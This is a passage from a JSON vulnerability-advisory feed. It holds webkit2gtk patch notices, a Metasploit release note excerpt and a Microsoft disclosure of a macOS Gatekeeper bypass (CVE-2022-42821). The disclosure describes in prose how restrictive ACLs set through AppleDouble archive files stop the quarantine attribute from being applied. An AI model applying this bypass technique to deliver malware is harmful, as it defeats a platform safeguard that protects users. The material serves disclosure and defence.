instead appear. This has been remedied by improving the date handling logic for the `search` command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.36...6.1.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-31T11%3A00%3A06-05%3A00..2022-04-07T12%3A52%3A39-04%3A00%22>)\n * [Full diff 6.1.36...6.1.37](<https://github.com/rapid7/metasploit-framework/compare/6.1.36...6.1.37>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T17:50:10", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616", "CVE-2022-26904", "CVE-2022-28381"], "modified": "2022-04-08T17:50:10", "id": "RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339", "href": "https://blog.rapid7.com/2022/04/08/metasploit-wrap-up-151/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-11-03T15:51:28", "description": "An update that fixes three vulnerabilities is now available.\n\nDescription:\n\n This update for webkit2gtk3 fixes the following issues:\n\n Update to version 2.36.4 (bsc#1201221):\n\n - CVE-2022-22662: Processing maliciously crafted web content may disclose\n sensitive user information.\n - CVE-2022-22677: The video in a webRTC call may be interrupted if the\n audio capture gets interrupted.\n - CVE-2022-26710: Processing maliciously crafted web content may lead to\n arbitrary code execution.\n\n\nPatch Instructions:\n\n To install this SUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.4:\n\n zypper in -t patch openSUSE-SLE-15.4-2022-2523=1\n\n - SUSE Linux Enterprise Module for Development Tools 15-SP4:\n\n zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP4-2022-2523=1\n\n - SUSE Linux Enterprise Module for Desktop Applications 15-SP4:\n\n zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP4-2022-2523=1\n\n - SUSE Linux Enterprise Module for Basesystem 15-SP4:\n\n zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP4-2022-2523=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-22T00:00:00", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2022-07-22T00:00:00", "id": "SUSE-SU-2022:2523-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/PBSNI6MLTLRF2V2WOHBE2MAHYOMEZU4F/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-03T15:51:28", "description": "An update that fixes three vulnerabilities is now available.\n\nDescription:\n\n This update for webkit2gtk3 fixes the following issues:\n\n Update to version 2.36.4 (bsc#1201221):\n\n - CVE-2022-22662: Processing maliciously crafted web content may disclose\n sensitive user information.\n - CVE-2022-22677: The video in a webRTC call may be interrupted if the\n audio capture gets interrupted.\n - CVE-2022-26710: Processing maliciously crafted web content may lead to\n arbitrary code execution.\n\n\nPatch Instructions:\n\n To install this SUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.4:\n\n zypper in -t patch openSUSE-SLE-15.4-2022-2525=1\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2022-2525=1\n\n - SUSE Manager Server 4.1:\n\n zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.1-2022-2525=1\n\n - SUSE Manager Retail Branch Server 4.1:\n\n zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.1-2022-2525=1\n\n - SUSE Manager Proxy 4.1:\n\n zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.1-2022-2525=1\n\n - SUSE Linux Enterprise Server for SAP 15-SP2:\n\n zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP2-2022-2525=1\n\n - SUSE Linux Enterprise Server 15-SP2-LTSS:\n\n zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-LTSS-2022-2525=1\n\n - SUSE Linux Enterprise Server 15-SP2-BCL:\n\n zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-BCL-2022-2525=1\n\n - SUSE Linux Enterprise Module for Desktop Applications 15-SP3:\n\n zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP3-2022-2525=1\n\n - SUSE Linux Enterprise Module for Basesystem 15-SP3:\n\n zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2022-2525=1\n\n - SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS:\n\n zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-LTSS-2022-2525=1\n\n - SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS:\n\n zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-ESPOS-2022-2525=1\n\n - SUSE Enterprise Storage 7:\n\n zypper in -t patch SUSE-Storage-7-2022-2525=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-22T00:00:00", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2022-07-22T00:00:00", "id": "SUSE-SU-2022:2525-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LPLR6XKHSXBARGUVHBD2LN3EVYWUJGXH/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "mageia": [{"lastseen": "2023-08-12T00:48:39", "description": "The webkit2 package has been updated to version 2.36.4, fixing several security issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T08:32:28", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2022-07-12T08:32:28", "id": "MGASA-2022-0254", "href": "https://advisories.mageia.org/MGASA-2022-0254.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:20:55", "description": "\nThe following vulnerabilities have been discovered in the WebKitGTK\nweb engine:\n\n\n* [CVE-2022-22624](https://security-tracker.debian.org/tracker/CVE-2022-22624)\nKirin discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2022-22628](https://security-tracker.debian.org/tracker/CVE-2022-22628)\nKirin discovered that Processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2022-22629](https://security-tracker.debian.org/tracker/CVE-2022-22629)\nJeonghoon Shin discovered that processing maliciously crafted web\n content may lead to arbitrary code execution.\n\n\nFor the oldstable distribution (buster), these problems have been fixed\nin version 2.36.0-3~deb10u1.\n\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 2.36.0-3~deb11u1.\n\n\nWe recommend that you upgrade your webkit2gtk packages.\n\n\nFor the detailed security status of webkit2gtk please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/webkit2gtk](https://security-tracker.debian.org/tracker/webkit2gtk)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-04-08T00:00:00", "type": "osv", "title": "webkit2gtk - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22624"], "modified": "2022-08-10T07:20:51", "id": "OSV:DSA-5115-1", "href": "https://osv.dev/vulnerability/DSA-5115-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T07:20:54", "description": "\nThe following vulnerabilities have been discovered in the WPE WebKit\nweb engine:\n\n\n* [CVE-2022-22624](https://security-tracker.debian.org/tracker/CVE-2022-22624)\nKirin discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2022-22628](https://security-tracker.debian.org/tracker/CVE-2022-22628)\nKirin discovered that Processing maliciously crafted web content\n may lead to arbitrary code execution.\n* [CVE-2022-22629](https://security-tracker.debian.org/tracker/CVE-2022-22629)\nJeonghoon Shin discovered that processing maliciously crafted web\n content may lead to arbitrary code execution.\n\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 2.36.0-2~deb11u1.\n\n\nWe recommend that you upgrade your wpewebkit packages.\n\n\nFor the detailed security status of wpewebkit please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/wpewebkit](https://security-tracker.debian.org/tracker/wpewebkit)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-04-08T00:00:00", "type": "osv", "title": "wpewebkit - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22624"], "modified": "2022-08-10T07:20:51", "id": "OSV:DSA-5116-1", "href": "https://osv.dev/vulnerability/DSA-5116-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "mmpc": [{"lastseen": "2022-12-20T03:05:16", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple\u2019s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call \u201cAchilles\u201d. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.\n\nAfter carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple&#x27;s [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.\n\nIn this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.\n\n## Unlocking the Gatekeeper security mechanism\n\nMany macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name \u201cResume\u201d. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:\n\n 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user\u2019s consent before its launched.\n 2. Otherwise, the user is informed that the app cannot be run as it\u2019s untrusted.\n\nExtended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:\n \n \n flag;date;agent_name;UUID\n\nExtended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.\n\nA flag value of \u201c0083\u201d enforces Gatekeeper restrictions on the file, as displayed below:\n\nFigure 1. A common _com.apple.quarantine_ extended attribute value Figure 2. Gatekeeper blocking an untrusted downloaded file\n\nDue to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.\n\n## Historical overview of Gatekeeper bypasses\n\nNumerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:\n\n 1. Misuse the _com.apple.quarantine_ extended attribute assignment.\n 2. Find a vulnerability in the components that enforce policy checks on quarantined files.\n\nTwo cases that we don\u2019t consider to constitute a \u201ctrue\u201d Gatekeeper bypass are:\n\n 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.\n 2. MITRE\u2019s definition of \u201cGatekeeper Bypass\u201d ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.\n\nHere are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:\n\n**Vulnerability**| **Exploits**| **Description** \n---|---|--- \n**[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)**| Assignment of the quarantine attribute.| Gzip files archived in BOM archives are not assigned with the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). \n**[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)**| Assignment of the quarantine attribute.| Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). \n**[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)**| Component(s) that enforce policy checks.| App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). \n**[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)**| Component(s) that enforce policy checks.| A security bug in the way files with a \u201c_Shebang_\u201d (#!) header are interpreted by _syspolicyd_ cause it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). \n**[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)**| Assignment of the quarantine attribute.| Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). \n**[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)**| Component(s) that enforce policy checks.| Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). \n \n## Metadata persistence over AppleDouble\n\nIntrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren\u2019t assigned with quarantine attributes\u2014we looked for a mechanism that could persist different kinds of metadata over archives.\n\nAfter some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.\n\nEven though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there\u2019s only a \u201csingle\u201d file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a \u201c._\u201d prefix.\n\nInterestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.\n\nThe AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:\n\nFigure 3. AppleDouble file created as \u201c._somefile\u201d\n\nWhen the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:\n\nFigure 4. Using AppleDouble in a zip file to preserve extended attributes\n\nUsing this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.\n\nOur first approach was to generate many large extended attributes in the AppleDouble format such that there won\u2019t be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn\u2019t work\u2014AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).\n\nResearching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.\n\nFigure 5. The code that allows setting arbitrary Access Control Lists\n\n## Using ACLs for exploitation\n\nAccess Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file \u201cmode\u201d, which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file\u2019s mode can be viewed by listing files with the \u201c_-l_\u201d (long) flag:\n\nFigure 6. Viewing the &quot;hello.sh&quot; file mode, the owner can do anything while others can only read or launch it\n\nUnlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It\u2019s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:\n\nFigure 7. Denying file reads from everyone makes it impossible to read the file despite its mode\n\nThe set of authorizations supported by ACLs is well-documented by Apple in the _chmod_ manual, which contain more than the traditional reading, writing, or launching abilities, including:\n\n * _writeattr_: controls the ability to write attributes to the file\n * _writeextattr_: controls the ability to write extended attributes to the file\n * _writesecurity_: controls the ability to set ACLs to the file\n * _chown_: controls the ability to set the owner of the file\n * _delete:_ controls the ability to delete the file\n\nEquipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.\n\nTwo minor challenges that we had to overcome during the proof-of-concept (POC) development were:\n\n * The format of the ACL text as saved in the AppleDouble file isn\u2019t identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS [_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL with the correct format.\n * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.\n\nTherefore, our POC is as follows:\n\n 1. Create a fake directory structure with an arbitrary icon and payload.\n 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of \u201c_everyone deny write,writeattr,writeextattr,writesecurity,chown_\u201d). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.\n 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.\n\nWe named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:\n\nThe AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:\n\nFigure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass\n\n## Improving security for all through research and threat intelligence sharing\n\nThe threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues\u2014regardless of the platform or device in use.\n\nAs environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender\u2019s Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.\n\nThis case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.\n\nFigure 9. Detection by Microsoft Defender for Endpoint\n\nOur Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users\u2019 computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.\n\n**Jonathan Bar Or**\n\nMicrosoft 365 Defender Research Team\n\nThe post [Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mmpc", "title": "Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 